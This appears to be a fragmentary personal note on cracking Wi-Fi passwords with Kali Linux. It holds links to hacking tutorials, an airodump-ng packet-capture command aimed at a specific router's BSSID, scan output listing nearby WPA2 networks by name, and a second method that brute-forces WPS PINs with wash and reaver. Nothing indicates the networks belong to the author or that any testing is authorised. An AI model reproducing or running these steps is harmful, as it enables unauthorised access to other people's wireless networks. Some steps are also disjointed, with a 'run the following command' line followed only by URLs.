Wifi Crack using kali Linux
Steps:
1. Run the following command
http://lewiscomputerhowto.blogspot.in/2014/06/how-to-hack-wpawpa2-wi-fi-with-kali.html
https://www.google.co.in/search?q=how+to+use+kali+linux+to+crack+wifi+password&oq=how+to+use+kali+linux+to+crack+wifi+password&aqs=chrome..69i57.14174j0j7&sourceid=chrome&ie=UTF-8


Router BSSID: 08:BD:43:62:D3:5F
airodump-ng -c 4 --bssid 08:BD:43:62:D3:5F -w /home/mango/Desktop/ mon0

08:BD:43:62:D3:5E  -58       17        0    0   4  54e. WPA2 CCMP 

 EC:08:6B:23:E7:34  -84        7        0    0   4  54e. WPA2 CCMP   PSK  sameeksha

Method2:
airmon-ng

airmon-ng stop wlan0

airodump-ng wlan0

wash -i wlan0 -c ## -C -s

reaver -i wlan0 -b <BSSID> --fail-wait=360









